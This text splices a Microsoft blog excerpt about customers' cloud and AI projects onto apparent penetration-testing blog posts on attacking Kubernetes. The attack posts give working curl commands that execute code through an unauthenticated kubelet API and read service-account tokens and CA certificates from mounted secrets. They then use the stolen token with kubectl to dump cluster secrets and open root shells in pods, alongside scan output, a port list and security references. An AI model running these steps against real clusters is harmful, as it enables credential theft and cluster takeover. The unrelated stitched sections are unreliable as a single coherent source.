In the healthcare industry, earlier this month, we announced a seven-year strategic cloud partnership with Walgreens Boots Alliance (WBA). Through the partnership, WBA will harness the power of Microsoft Azure cloud and AI technology, Microsoft 365, health industry investments and new retail solutions with WBA’s customer reach, convenient locations, outpatient health care services and industry expertise to make health care delivery more personal, affordable and accessible for people around the world.

Pharmacy staff member with patient

Walgreens Boots Alliance will harness the power of Microsoft Azure cloud and AI technology and Microsoft 365 to help improve health outcomes and lower overall costs.

Customers tell us that one of the biggest advantages of working with Microsoft is our partner ecosystem. That ecosystem has brought together BevMo!, a wine and liquor store, and Fellow Inc., a Microsoft partner. Today, BevMo! is using Fellow Robots to connect supply chain efficiency with customer delight. Power BI, Microsoft Azure and AI enable the Fellow Robots to provide perfect product location using image recognition to offer customers different types of products by integrating point of sale interactions. BevMo! is also using Microsoft’s intelligent cloud solutions to empower its store associates to deliver better customer service.

Fellow Robots product in a retail store

Fellow Robots from partner Fellow, Inc. are helping BevMo! connect supply chain efficiency and better customer service. The robots are powered by Microsoft Azure, AI and Machine Learning.

In automotive, companies like Toyota are breaking new ground in mixed reality. With its HoloLens solution, Toyota can now project existing 3D CAD data used in the vehicle design process directly onto the vehicle for measurements, optimizing existing processes and minimizing errors. In addition, Toyota is trialing Dynamics 365 Layout to improve machinery layout within its facilities and Dynamics 365 Remote Assist to provide workers with expert support from off-site designers and engineers. Also, Toyota has deployed Surface devices, enabling designers and engineers to fluidly connect in real time as part of a company-wide investment to accelerate innovation through collaboration.

A Toyota engineer uses Microsoft HoloLens to perform a process called “film coating thickness inspection” to manage the thickness of the paint for consistent coating quality on every vehicle.
A Toyota engineer uses Microsoft HoloLens to perform a process called “film coating thickness inspection” to manage the thickness of the paint for consistent coating quality on every vehicle.

Digital transformation is also changing the way we learn. For example, in the education space, Law School Admission Council (LSAC), a non-profit organization devoted to law and education worldwide, announced its selection of the Windows platform on Surface Go devices to digitize the Law School Admission test (LSAT) for more than 130,000 LSAT test takers each year. In addition to the Digital LSAT, Microsoft is working with LSAC on several initiatives to improve and expand access to legal education.

Surface Go device
One of the thousands of Microsoft Surface Go devices running Windows 10 and proprietary software to facilitate a the modern and efficient Digital LSAT starting in July 2019.

Beyond manufacturing and retail, organizations are adopting the cloud and AI to reimagine environmental conservation. Fish may not be top of mind when thinking about innovation, but Australia’s Northern Territory is building its own technology to ensure the sustainable management of fisheries resources for future generations. For marine biologists, a seemingly straightforward task like counting fish becomes significantly more challenging or even dangerous when visibility in marine environments is low and when large predators (think: saltwater crocodiles) live in those environments. That is where AI comes in. Scientists use the technology to automatically identify and count fish photographed by underwater cameras. Over time, the AI solution becomes more accurate with each new fish analyzed. Greater availability of this technology may soon help other areas of the world improve their understanding of aquatic resources.

Shane Penny, Fisheries Research Scientist and his team using baited underwater cameras as part of Australia’s Northern Territory Fisheries artificial intelligence project with Microsoft to fuel insights in marine science.

Shane Penny, Fisheries Research Scientist and his team using baited underwater cameras as part of Australia’s Northern Territory Fisheries artificial intelligence project with Microsoft to fuel insights in marine science.

With almost 13,000 post offices and more than 134,000 employees, Poste Italiane is Italy’s largest distribution network. The organization delivers traditional mail and parcels but also operates at the digital frontier through innovation in financial and insurance services as well as mobile and digital payments solutions. Poste Italiane selected Dynamics 365 for its CRM, creating the largest online deployment in Italy. The firm sees the deployment as a critical part of its strategy to support growth, contain costs and deliver a better, richer customer experience.

Poste Italiane building
Poste Italiane’s selection of Microsoft is part of their digital transformation program that aims to reshape the retail sales approach and increase cross-selling revenues and profitability of its subsidiaries BancoPosta and PosteVita.

These examples only scratch the surface of how digital transformation and digital capabilities are bringing together people, data and processes in a way that generates value, competitive advantage and powers innovation across every industry. I am incredibly humbled that our customers and partners have chosen Microsoft to support their digital journey.

The post From shopping to car design, our customers and partners spark innovation across every industry appeared first on The Official Microsoft Blog.

Kubernetes: Kube-Hunter 10255

Below is some sample output that mainly is here to see what open 10255 will give you and look like.  What probably of most interest is the /pods endpoint




or the /metrics endpoint



or the /stats endpoint




$ ./kube-hunter.py
Choose one of the options below:
1. Remote scanning      (scans one or more specific IPs or DNS names)
2. Subnet scanning      (scans subnets on all local network interfaces)
3. IP range scanning    (scans a given IP range)
Your choice: 1
Remotes (separated by a ','): 1.2.3.4
~ Started
~ Discovering Open Kubernetes Services...
|
| Etcd:
|   type: open service
|   service: Etcd
|_  host: 1.2.3.4:2379
|
| API Server:
|   type: open service
|   service: API Server
|_  host: 1.2.3.4:443
|
| API Server:
|   type: open service
|   service: API Server
|_  host: 1.2.3.4:6443
|
| Etcd Remote version disclosure:
|   type: vulnerability
|   host: 1.2.3.4:2379
|   description:
|     Remote version disclosure might give an
|_    attacker a valuable data to attack a cluster
|
| Etcd is accessible using insecure connection (HTTP):
|   type: vulnerability
|   host: 1.2.3.4:2379
|   description:
|     Etcd is accessible using HTTP (without
|     authorization and authentication), it would allow a
|     potential attacker to
|     gain access to
|_    the etcd
|
| Kubelet API (readonly):
|   type: open service
|   service: Kubelet API (readonly)
|_  host: 1.2.3.4:10255
|
| Etcd Remote Read Access Event:
|   type: vulnerability
|   host: 1.2.3.4:2379
|   description:
|     Remote read access might expose to an
|_    attacker cluster's possible exploits, secrets and more.
|
| K8s Version Disclosure:
|   type: vulnerability
|   host: 1.2.3.4:10255
|   description:
|     The kubernetes version could be obtained
|_    from logs in the /metrics endpoint
|
| Privileged Container:
|   type: vulnerability
|   host: 1.2.3.4:10255
|   description:
|     A Privileged container exist on a node.
|     could expose the node/cluster to unwanted root
|_    operations
|
| Cluster Health Disclosure:
|   type: vulnerability
|   host: 1.2.3.4:10255
|   description:
|     By accessing the open /healthz handler, an
|     attacker could get the cluster health state without
|_    authenticating
|
| Exposed Pods:
|   type: vulnerability
|   host: 1.2.3.4:10255
|   description:
|     An attacker could view sensitive information
|     about pods that are bound to a Node using
|_    the /pods endpoint

----------

Nodes
+-------------+---------------+
| TYPE        | LOCATION      |
+-------------+---------------+
| Node/Master | 1.2.3.4    |
+-------------+---------------+

Detected Services
+----------------------+---------------------+----------------------+
| SERVICE              | LOCATION            | DESCRIPTION          |
+----------------------+---------------------+----------------------+
| Kubelet API          | 1.2.3.4:10255       | The read-only port   |
| (readonly)           |                     | on the kubelet       |
|                      |                     | serves health        |
|                      |                     | probing endpoints,   |
|                      |                     | and is relied upon   |
|                      |                     | by many kubernetes   |
|                      |                     | componenets          |
+----------------------+---------------------+----------------------+
| Etcd                 | 1.2.3.4:2379        | Etcd is a DB that    |
|                      |                     | stores cluster's     |
|                      |                     | data, it contains    |
|                      |                     | configuration and    |
|                      |                     | current state        |
|                      |                     | information, and     |
|                      |                     | might contain        |
|                      |                     | secrets              |
+----------------------+---------------------+----------------------+
| API Server           | 1.2.3.4:6443        | The API server is in |
|                      |                     | charge of all        |
|                      |                     | operations on the    |
|                      |                     | cluster.             |
+----------------------+---------------------+----------------------+
| API Server           | 1.2.3.4:443         | The API server is in |
|                      |                     | charge of all        |
|                      |                     | operations on the    |
|                      |                     | cluster.             |
+----------------------+---------------------+----------------------+

Vulnerabilities
+---------------------+----------------------+----------------------+----------------------+----------------------+
| LOCATION            | CATEGORY             | VULNERABILITY        | DESCRIPTION          | EVIDENCE             |
+---------------------+----------------------+----------------------+----------------------+----------------------+
| 1.2.3.4:2379        | Unauthenticated      | Etcd is accessible   | Etcd is accessible   | {"etcdserver":"2.3.8 |
|                     | Access               | using insecure       | using HTTP (without  | ","etcdcluster":"2.3 |
|                     |                      | connection (HTTP)    | authorization and    | ...                  |
|                     |                      |                      | authentication), it  |                      |
|                     |                      |                      | would allow a        |                      |
|                     |                      |                      | potential attacker   |                      |
|                     |                      |                      | to                   |                      |
|                     |                      |                      |      gain access to  |                      |
|                     |                      |                      | the etcd             |                      |
+---------------------+----------------------+----------------------+----------------------+----------------------+
| 1.2.3.4:2379        | Information          | Etcd Remote version  | Remote version       | {"etcdserver":"2.3.8 |
|                     | Disclosure           | disclosure           | disclosure might     | ","etcdcluster":"2.3 |
|                     |                      |                      | give an attacker a   | ...                  |
|                     |                      |                      | valuable data to     |                      |
|                     |                      |                      | attack a cluster     |                      |
+---------------------+----------------------+----------------------+----------------------+----------------------+
| 1.2.3.4:10255       | Information          | K8s Version          | The kubernetes       | v1.5.6-rc17          |
|                     | Disclosure           | Disclosure           | version could be     |                      |
|                     |                      |                      | obtained from logs   |                      |
|                     |                      |                      | in the /metrics      |                      |
|                     |                      |                      | endpoint             |                      |
+---------------------+----------------------+----------------------+----------------------+----------------------+
| 1.2.3.4:10255       | Information          | Exposed Pods         | An attacker could    | count: 68            |
|                     | Disclosure           |                      | view sensitive       |                      |
|                     |                      |                      | information about    |                      |
|                     |                      |                      | pods that are bound  |                      |
|                     |                      |                      | to a Node using the  |                      |
|                     |                      |                      | /pods endpoint       |                      |
+---------------------+----------------------+----------------------+----------------------+----------------------+
| 1.2.3.4:10255       | Information          | Cluster Health       | By accessing the     | status: ok           |
|                     | Disclosure           | Disclosure           | open /healthz        |                      |
|                     |                      |                      | handler, an attacker |                      |
|                     |                      |                      | could get the        |                      |
|                     |                      |                      | cluster health state |                      |
|                     |                      |                      | without              |                      |
|                     |                      |                      | authenticating       |                      |
+---------------------+----------------------+----------------------+----------------------+----------------------+
| 1.2.3.4:2379        | Access Risk          | Etcd Remote Read     | Remote read access   | {"action":"get","nod |
|                     |                      | Access Event         | might expose to an   | e":{"dir":true,"node |
|                     |                      |                      | attacker cluster's   | ...                  |
|                     |                      |                      | possible exploits,   |                      |
|                     |                      |                      | secrets and more.    |                      |
+---------------------+----------------------+----------------------+----------------------+----------------------+
| 1.2.3.4:10255       | Access Risk          | Privileged Container | A Privileged         | pod: node-exporter-  |
|                     |                      |                      | container exist on a | 1fmd9-z9685,         |
|                     |                      |                      | node. could expose   | containe...          |
|                     |                      |                      | the node/cluster to  |                      |
|                     |                      |                      | unwanted root        |                      |
|                     |                      |                      | operations           |                      |
+---------------------+----------------------+----------------------+----------------------+----------------------+

Kubernetes: unauth kublet API 10250 token theft & kubectl

Kubernetes: unauthenticated kublet API (10250) token theft & kubectl access & exec


kube-hunter output to get us started:

do a curl -s https://k8-node:10250/runningpods/ to get a list of running pods

With that data, you can craft your post request to exec within a pod so we can poke around.

 Example request:

curl -k -XPOST "https://k8-node:10250/run/kube-system/kube-dns-5b1234c4d5-4321/dnsmasq" -d "cmd=ls -la /"

Output:
total 35264
drwxr-xr-x    1 root     root          4096 Nov  9 16:27 .
drwxr-xr-x    1 root     root          4096 Nov  9 16:27 ..
-rwxr-xr-x    1 root     root             0 Nov  9 16:27 .dockerenv
drwxr-xr-x    2 root     root          4096 Nov  9 16:27 bin
drwxr-xr-x    5 root     root           380 Nov  9 16:27 dev
-rwxr-xr-x    1 root     root      36047205 Apr 13  2018 dnsmasq-nanny
drwxr-xr-x    1 root     root          4096 Nov  9 16:27 etc
drwxr-xr-x    2 root     root          4096 Jan  9  2018 home
drwxr-xr-x    5 root     root          4096 Nov  9 16:27 lib
drwxr-xr-x    5 root     root          4096 Nov  9 16:27 media
drwxr-xr-x    2 root     root          4096 Jan  9  2018 mnt
dr-xr-xr-x  134 root     root             0 Nov  9 16:27 proc
drwx------    2 root     root          4096 Jan  9  2018 root
drwxr-xr-x    2 root     root          4096 Jan  9  2018 run
drwxr-xr-x    2 root     root          4096 Nov  9 16:27 sbin
drwxr-xr-x    2 root     root          4096 Jan  9  2018 srv
dr-xr-xr-x   12 root     root             0 Dec 19 19:06 sys
drwxrwxrwt    1 root     root          4096 Nov  9 17:00 tmp
drwxr-xr-x    7 root     root          4096 Nov  9 16:27 usr
drwxr-xr-x    1 root     root          4096 Nov  9 16:27 var

Check the env and see if the kublet tokens are in the environment variables. depending on the cloud provider or hosting provider they are sometimes right there. Otherwise we need to retrieve them from:
1. the mounted folder
2. the cloud metadata url

Check the env with the following command:

curl -k -XPOST "https://k8-node:10250/run/kube-system/kube-dns-5b1234c4d5-4321/dnsmasq" -d "cmd=env"

We are looking for the KUBLET_CERT, KUBLET_KEY, & CA_CERT environment variables.


We are also looking for the kubernetes API server. This is most likely NOT the host you are messing with on 10250. We are looking for something like:

KUBERNETES_PORT=tcp://10.10.10.10:443

or

KUBERNETES_MASTER_NAME: 10.11.12.13:443

Once we get the kubernetes tokens or keys we need to talk to the API server to use them. The kublet (10250) wont know what to do with them.  This may be (if we are lucky) another public IP or a 10. IP.  If it's a 10. IP we need to download kubectl to the pod.

Assuming it's not in the environment variables let's look and see if they are there in the mounted secrets

curl -k -XPOST "https://k8-node:10250/run/kube-system/kube-dns-5b1234c4d5-4321/dnsmasq" -d "cmd=mount"

sample output truncated:
cgroup on /sys/fs/cgroup/devices type cgroup (ro,nosuid,nodev,noexec,relatime,devices)
mqueue on /dev/mqueue type mqueue (rw,nosuid,nodev,noexec,relatime)
/dev/sda1 on /dev/termination-log type ext4 (rw,relatime,commit=30,data=ordered)
/dev/sda1 on /etc/k8s/dns/dnsmasq-nanny type ext4 (rw,relatime,commit=30,data=ordered)
tmpfs on /var/run/secrets/kubernetes.io/serviceaccount type tmpfs (ro,relatime)
/dev/sda1 on /etc/resolv.conf type ext4 (rw,nosuid,nodev,relatime,commit=30,data=ordered)
/dev/sda1 on /etc/hostname type ext4 (rw,nosuid,nodev,relatime,commit=30,data=ordered)
/dev/sda1 on /etc/hosts type ext4 (rw,relatime,commit=30,data=ordered)
shm on /dev/shm type tmpfs (rw,nosuid,nodev,noexec,relatime,size=65536k)

We can then cat out the ca.cert, namespace, and token

curl -k -XPOST "https://k8-node:10250/run/kube-system/kube-dns-5b1234c4d5-4321/dnsmasq" -d "cmd=ls -la /var/run/secrets/kubernetes.io/serviceaccount"

Output:

total 4
drwxrwxrwt    3 root     root         140 Nov  9 16:27 .
drwxr-xr-x    3 root     root        4.0K Nov  9 16:27 ..
lrwxrwxrwx    1 root     root          13 Nov  9 16:27 ca.crt -> ..data/ca.crt
lrwxrwxrwx    1 root     root          16 Nov  9 16:27 namespace -> ..data/namespace
lrwxrwxrwx    1 root     root          12 Nov  9 16:27 token -> ..data/token

and then:

curl -k -XPOST "https://k8-node:10250/run/kube-system/kube-dns-5b1234c4d5-4321/dnsmasq" -d "cmd=cat /var/run/secrets/kubernetes.io/serviceaccount/token"

output:

eyJhbGciOiJSUzI1NiI---SNIP---

Also grab the ca.crt :-)

With the token, ca.crt and api server IP address we can issue commands with kubectl.

$ kubectl --server=https://1.2.3.4 --certificate-authority=ca.crt --token=eyJhbGciOiJSUzI1NiI---SNIP--- get pods --all-namespaces

Output:

NAMESPACE     NAME                                                            READY     STATUS    RESTARTS   AGE
kube-system   event-exporter-v0.1.9-5c-SNIP                          2/2       Running   2          120d
kube-system   fluentd-cloud-logging-gke-eeme-api-default-pool   1/1       Running   1          2y
kube-system   heapster-v1.5.2-5-SNIP                              3/3       Running   0          27d
kube-system   kube-dns-5b8-SNIP                                       4/4       Running   0          61d
kube-system   kube-dns-autoscaler-2-SNIP                             1/1       Running   1          252d
kube-system   kube-proxy-gke-eeme-api-default-pool              1/1       Running   1          2y 
kube-system   kubernetes-dashboard-7-SNIP                           1/1       Running   0          27d
kube-system   l7-default-backend-10-SNIP                            1/1       Running   0          27d
kube-system   metrics-server-v0.2.1-7-SNIP                         2/2       Running   0          120d

at this point you can pull secrets or exec into any available pods

$ kubectl --server=https://1.2.3.4 --certificate-authority=ca.crt --token=eyJhbGciOiJSUzI1NiI---SNIP--- get secrets --all-namespaces

to get a shell via kubectl

$ kubectl --server=https://1.2.3.4 --certificate-authority=ca.crt --token=eyJhbGciOiJSUzI1NiI---SNIP--- get pods --namespace=kube-system

NAME                                                            READY     STATUS    RESTARTS   AGE
event-exporter-v0.1.9-5-SNIP               2/2       Running   2          120d
--SNIP--
metrics-server-v0.2.1-7f8ee58c8f-ab13f     2/2       Running   0          120d

$ kubectl exec -it metrics-server-v0.2.1-7f8ee58c8f-ab13f --namespace=kube-system--server=https://1.2.3.4  --certificate-authority=ca.crt --token=eyJhbGciOiJSUzI1NiI---SNIP--- /bin/sh

/ # ls -lah
total 40220
drwxr-xr-x    1 root     root        4.0K Sep 11 07:25 .
drwxr-xr-x    1 root     root        4.0K Sep 11 07:25 ..
-rwxr-xr-x    1 root     root           0 Sep 11 07:25 .dockerenv
drwxr-xr-x    3 root     root        4.0K Sep 11 07:25 apiserver.local.config
drwxr-xr-x    2 root     root       12.0K Sep 11 07:24 bin
drwxr-xr-x    5 root     root         380 Sep 11 07:25 dev
drwxr-xr-x    1 root     root        4.0K Sep 11 07:25 etc
drwxr-xr-x    2 nobody   nogroup     4.0K Nov  1  2017 home
-rwxr-xr-x    2 root     root       39.2M Dec 20  2017 metrics-server
dr-xr-xr-x  135 root     root           0 Sep 11 07:25 proc
drwxr-xr-x    1 root     root        4.0K Dec 19 21:33 root
dr-xr-xr-x   12 root     root           0 Dec 19 19:06 sys
drwxrwxrwt    1 root     root        4.0K Oct 18 13:57 tmp
drwxr-xr-x    3 root     root        4.0K Sep 11 07:24 usr
drwxr-xr-x    1 root     root        4.0K Sep 11 07:25 var

For completeness if you got the keys via the environment variables the kubectl command would be something like this:

kubectl --server=https://1.2.3.4 --certificate-authority=ca.crt --client-key=kublet.key --client-certificate=kublet.crt get pods --all-namespaces


Kubernetes: unauth kublet API 10250 basic code exec

Unauth API access (10250)

Most Kubernetes deployments provide authentication for this port. But it’s still possible to expose it inadvertently and it's still pretty common to find it exposed via the "insecure API service" option.


Everybody who has access to the service kubelet port (10250), even without a certificate, can execute any command inside the container.

# /run/%namespace%/%pod_name%/%container_name%

example:

$ curl -k -XPOST "https://k8s-node-1:10250/run/kube-system/node-exporter-iuwg7/node-exporter" -d "cmd=ls -la /"

total 12
drwxr-xr-x   13 root     root           148 Aug 26 11:31 .
drwxr-xr-x   13 root     root           148 Aug 26 11:31 ..
-rwxr-xr-x    1 root     root             0 Aug 26 11:31 .dockerenv
drwxr-xr-x    2 root     root          8192 May  5 22:22 bin
drwxr-xr-x    5 root     root           380 Aug 26 11:31 dev
drwxr-xr-x    3 root     root           135 Aug 26 11:31 etc
drwxr-xr-x    2 nobody   nogroup          6 Mar 18 16:38 home
drwxr-xr-x    2 root     root             6 Apr 23 11:17 lib
dr-xr-xr-x  353 root     root             0 Aug 26 07:14 proc
drwxr-xr-x    2 root     root             6 Mar 18 16:38 root
dr-xr-xr-x   13 root     root             0 Aug 26 15:12 sys
drwxrwxrwt    2 root     root             6 Mar 18 16:38 tmp
drwxr-xr-x    4 root     root            31 Apr 23 11:17 usr
drwxr-xr-x    5 root     root            41 Aug 26 11:31 var


Here is how to get all secrets which container uses (environment variables - commons to see kublet tokens here):

$ curl -k -XPOST "https://k8s-node-1:10250/run/kube-system//" -d "cmd=env"

The list of all pods and containers which were scheduled on the Kubernetes worker node could be retrieved using command below:

$ curl -sk https://k8s-node-1:10250/runningpods/ | python -mjson.tool

or

$ curl --insecure  https://k8s-node-1:10250/runningpods | jq


Example 1:

curl --insecure  https://1.2.3.4:10250/runningpods | jq

Output:

Forbidden (user=system:anonymous, verb=create, resource=nodes, subresource=proxy)

Example 2:
curl --insecure  https://1.2.3.4:10250/runningpods | jq

Output:

Unauthorized

Example 3:

curl --insecure  https://1.2.3.4:10250/runningpods | jq


Output:

{
  "kind": "PodList",
  "apiVersion": "v1",
  "metadata": {},
  "items": [
    {
      "metadata": {
        "name": "kube-dns-5b8bf6c4f4-k5n2g",
        "generateName": "kube-dns-5b8bf6c4f4-",
        "namespace": "kube-system",
        "selfLink": "/api/v1/namespaces/kube-system/pods/kube-dns-5b8bf6c4f4-k5n2g",
        "uid": "63438841-e43c-11e8-a104-42010a80038e",
        "resourceVersion": "85366060",
        "creationTimestamp": "2018-11-09T16:27:44Z",
        "labels": {
          "k8s-app": "kube-dns",
          "pod-template-hash": "1646927090"
        },
        "annotations": {
          "kubernetes.io/config.seen": "2018-11-09T16:27:44.990071791Z",
          "kubernetes.io/config.source": "api",
          "scheduler.alpha.kubernetes.io/critical-pod": ""
        },
        "ownerReferences": [
          {
            "apiVersion": "extensions/v1beta1",
            "kind": "ReplicaSet",
            "name": "kube-dns-5b8bf6c4f4",
            "uid": "633db9d4-e43c-11e8-a104-42010a80038e",
            "controller": true
          }
        ]
      },
      "spec": {
        "volumes": [
          {
            "name": "kube-dns-config",
            "configMap": {
              "name": "kube-dns",
              "defaultMode": 420
            }
          },
          {
            "name": "kube-dns-token-xznw5",
            "secret": {
              "secretName": "kube-dns-token-xznw5",
              "defaultMode": 420
            }
          }
        ],
        "containers": [
          {
            "name": "dnsmasq",
            "image": "gcr.io/google-containers/k8s-dns-dnsmasq-nanny-amd64:1.14.10",
            "args": [
              "-v=2",
              "-logtostderr",
              "-configDir=/etc/k8s/dns/dnsmasq-nanny",
              "-restartDnsmasq=true",
              "--",
              "-k",
              "--cache-size=1000",
              "--no-negcache",
              "--log-facility=-",
              "--server=/cluster.local/127.0.0.1#10053",
              "--server=/in-addr.arpa/127.0.0.1#10053",
              "--server=/ip6.arpa/127.0.0.1#10053"
            ],
            "ports": [
              {
                "name": "dns",
                "containerPort": 53,
                "protocol": "UDP"
              },
              {
                "name": "dns-tcp",
                "containerPort": 53,
                "protocol": "TCP"
              }
            ],
            "resources": {
              "requests": {
                "cpu": "150m",
                "memory": "20Mi"
              }
            },
            "volumeMounts": [
              {
                "name": "kube-dns-config",
                "mountPath": "/etc/k8s/dns/dnsmasq-nanny"
              },
              {
                "name": "kube-dns-token-xznw5",
                "readOnly": true,
                "mountPath": "/var/run/secrets/kubernetes.io/serviceaccount"
              }
            ],
            "livenessProbe": {
              "httpGet": {
                "path": "/healthcheck/dnsmasq",
                "port": 10054,
                "scheme": "HTTP"
              },
              "initialDelaySeconds": 60,
              "timeoutSeconds": 5,
              "periodSeconds": 10,
              "successThreshold": 1,
              "failureThreshold": 5
            },
            "terminationMessagePath": "/dev/termination-log",
            "imagePullPolicy": "IfNotPresent"
          },
        --------SNIP---------

With the output of the running pods command you can craft your command to do the code exec

$ curl -k -XPOST "https://k8s-node-1:10250/run///" -d "cmd=env"

as an example:



leaves you with:

curl -k -XPOST "https://kube-node-here:10250/run/kube-system/kube-dns-5b8bf6c4f4-k5n2g/dnsmasq" -d "cmd=ls -la /"

total 35264
drwxr-xr-x    1 root     root          4096 Nov  9 16:27 .
drwxr-xr-x    1 root     root          4096 Nov  9 16:27 ..
-rwxr-xr-x    1 root     root             0 Nov  9 16:27 .dockerenv
drwxr-xr-x    2 root     root          4096 Nov  9 16:27 bin
drwxr-xr-x    5 root     root           380 Nov  9 16:27 dev
-rwxr-xr-x    1 root     root      36047205 Apr 13  2018 dnsmasq-nanny
drwxr-xr-x    1 root     root          4096 Nov  9 16:27 etc
drwxr-xr-x    2 root     root          4096 Jan  9  2018 home
drwxr-xr-x    5 root     root          4096 Nov  9 16:27 lib
drwxr-xr-x    5 root     root          4096 Nov  9 16:27 media
drwxr-xr-x    2 root     root          4096 Jan  9  2018 mnt
dr-xr-xr-x  125 root     root             0 Nov  9 16:27 proc
drwx------    2 root     root          4096 Jan  9  2018 root
drwxr-xr-x    2 root     root          4096 Jan  9  2018 run
drwxr-xr-x    2 root     root          4096 Nov  9 16:27 sbin
drwxr-xr-x    2 root     root          4096 Jan  9  2018 srv
dr-xr-xr-x   12 root     root             0 Nov  9 16:27 sys
drwxrwxrwt    1 root     root          4096 Nov  9 17:00 tmp
drwxr-xr-x    7 root     root          4096 Nov  9 16:27 usr
drwxr-xr-x    1 root     root          4096 Nov  9 16:27 var

Kubernetes: List of ports

Other Kubernetes ports


What are some of the visible ports used in Kubernetes?

  • 44134/tcp - Helmtiller, weave, calico
  • 10250/tcp - kubelet (kublet exploit)
    • No authN, completely open
    • /pods
    • /runningpods
    • /containerLogs
  • 10255/tcp - kublet port (read-only)
    • /stats
    • /metrics
    • /pods
  • 4194/tcp - cAdvisor
  • 2379/tcp - etcd (see it on other ports though)
    • Etcd holds all the configs
    • Config storage
  • 30000 - dashboard
  • 443/6443 - api

Kubernetes: Kubernetes Dashboard


Tesla was famously hacked for leaving this open and it's pretty rare to find it exposed externally now but useful to know what it is and what you can do with it.

Usually found on port 30000

kube-hunter finding for it:

Vulnerabilities
+-----------------------+---------------+----------------------+----------------------+------------------+
| LOCATION              | CATEGORY      | VULNERABILITY        | DESCRIPTION          | EVIDENCE         |
+-----------------------+---------------+----------------------+----------------------+------------------+
| 1.2.3.4:30000         | Remote Code   | Dashboard Exposed    | All oprations on the | nodes: pach-okta |
|                       | Execution     |                      | cluster are exposed  |                  |
+-----------------------+---------------+----------------------+----------------------+------------------+

Why do you care?  It has access to all pods and secrets within the cluster. So rather than using command line tools to get secrets or run code you can just do it in a web browser.

Screenshots of what it looks like:
viewing secrets



utilization



logs

shells

Kubernetes: Kubelet API containerLogs endpoint


How to get the info that kube-hunter reports for open /containerLogs endpoint



Vulnerabilities
+---------------+-------------+------------------+----------------------+----------------+
| LOCATION       CATEGORY     | VULNERABILITY    | DESCRIPTION          | EVIDENCE       |
+---------------+-------------+------------------+----------------------+----------------+
+----------------+------------+------------------+----------------------+----------------+
| 1.2.3.4:10250 | Information | Exposed Container| Output logs from a   |                |
|               | Disclosure  | Logs             | running container    |                |
|               |             |                  | are using the        |                |
|               |             |                  | exposed              |                |
|               |             |                  | /containerLogs       |                |
|               |             |                  | endpoint             |                |
+---------------+-------------+------------------+----------------------+----------------+

First step, grab the output from /runningpods/ example below:



You'll need the namespace, pod name and container name.

Thus given the below runningpods output:


{"metadata":{"name":"monitoring-influxdb-grafana-v4-6679c46745-zhvjw","namespace":"kube-system","uid":"0d22cdad-06e5-11e9-a7f3-6ac885fbc092","creationTimestamp":null},"spec":{"containers":[{"name":"grafana","image":"sha256:8cb3de219af7bdf0b3ae66439aecccf94cebabb230171fa4b24d66d4a786f4f7","resources":{}},{"name":"influxdb","image":"sha256:577260d221dbb1be2d83447402d0d7c5e15501a89b0e2cc1961f0b24ed56c77c","resources":{}}]},

turns into:

https://1.2.3.4:10250/containerLogs/kube-system/monitoring-influxdb-grafana-v4-6679c46745-zhvjw/grafana



and

https://1.2.3.4:10250/containerLogs/kube-system/monitoring-influxdb-grafana-v4-6679c46745-zhvjw/influxdb



Kubernetes: Master Post

I have a few Kubernetes posts queued up and will make this the master post to index and give references for the topic. If i'm missing blog posts or useful resources ping me here or twitter.

Talks you should watch if you are interested in Kubernetes:


Hacking and Hardening Kubernetes Clusters by Example [I] - Brad Geesaman
https://www.youtube.com/watch?v=vTgQLzeBfRU
https://github.com/bgeesaman/
https://github.com/bgeesaman/hhkbe [demos for the talk above]
https://schd.ws/hosted_files/kccncna17/d8/Hacking%20and%20Hardening%20Kubernetes%20By%20Example%20v2.pdf [slide deck]


Perfect Storm Taking the Helm of Kubernetes Ian Coldwater
https://www.youtube.com/watch?v=1k-GIDXgfLw


A Hacker's Guide to Kubernetes and the Cloud - Rory McCune
Shipping in Pirate-Infested Waters: Practical Attack and Defense in Kubernetes
https://www.youtube.com/watch?v=ohTq0no0ZVU


Blog posts by others:

https://techbeacon.com/hackers-guide-kubernetes-security
https://elweb.co/the-security-footgun-in-etcd/
https://www.4armed.com/blog/hacking-kubelet-on-gke/
https://www.4armed.com/blog/kubeletmein-kubelet-hacking-tool/
https://www.4armed.com/blog/hacking-digitalocean-kubernetes/
https://github.com/freach/kubernetes-security-best-practice
https://neuvector.com/container-security/kubernetes-security-guide/
https://medium.com/@pczarkowski/the-kubernetes-api-call-is-coming-from-inside-the-cluster-f1a115bd2066
https://blog.intothesymmetry.com/2018/12/persistent-xsrf-on-kubernetes-dashboard.html
https://raesene.github.io/blog/2016/10/14/Kubernetes-Attack-Surface-cAdvisor/
https://raesene.github.io/blog/2017/05/01/Kubernetes-Security-etcd/
https://raesene.github.io/blog/2017/04/02/Kubernetes-Service-Tokens/
https://www.cyberark.com/threat-research-blog/securing-kubernetes-clusters-by-eliminating-risky-permissions/
https://labs.mwrinfosecurity.com/blog/attacking-kubernetes-through-kubelet/
https://blog.ropnop.com/attacking-default-installs-of-helm-on-kubernetes/


Auditing tools

https://github.com/Shopify/kubeaudit
https://github.com/aquasecurity/kube-bench
https://github.com/aquasecurity/kube-hunter

CVE-2018-1002105 resources

https://blog.appsecco.com/analysing-and-exploiting-kubernetes-apiserver-vulnerability-cve-2018-1002105-3150d97b24bb
https://gravitational.com/blog/kubernetes-websocket-upgrade-security-vulnerability/
https://github.com/gravitational/cve-2018-1002105
https://github.com/evict/poc_CVE-2018-1002105

CG Posts:

Open Etcd: http://carnal0wnage.attackresearch.com/2019/01/kubernetes-open-etcd.html
Etcd with kube-hunter: http://carnal0wnage.attackresearch.com/2019/01/kubernetes-kube-hunterpy-etcd.html
cAdvisor: http://carnal0wnage.attackresearch.com/2019/01/kubernetes-cadvisor.html

Kubernetes ports: https://carnal0wnage.attackresearch.com/2019/01/kubernetes-list-of-ports.html
Kubernetes dashboards: http://carnal0wnage.attackresearch.com/2019/01/kubernetes-kubernetes-dashboard.html
Kublet 10255: https://carnal0wnage.attackresearch.com/2019/01/kubernetes-kube-hunter-10255.html
Kublet 10250
     - Container Logs: http://carnal0wnage.attackresearch.com/2019/01/kubernetes-kubelet-api-containerlogs.html
     - Getting shellz 1: https://carnal0wnage.attackresearch.com/2019/01/kubernetes-unauth-kublet-api-10250.html
     - Getting shellz 2: https://carnal0wnage.attackresearch.com/2019/01/kubernetes-unauth-kublet-api-10250_16.html


Cloud Metadata Urls and Kubernetes


-I'll update as they get posted

Kubernetes: cAdvisor

"cAdvisor (Container Advisor) provides container users an understanding of the resource usage and performance characteristics of their running containers. It is a running daemon that collects, aggregates, processes, and exports information about running containers."

runs on port 4194

Links:
https://kubernetes.io/docs/tasks/debug-application-cluster/resource-usage-monitoring/
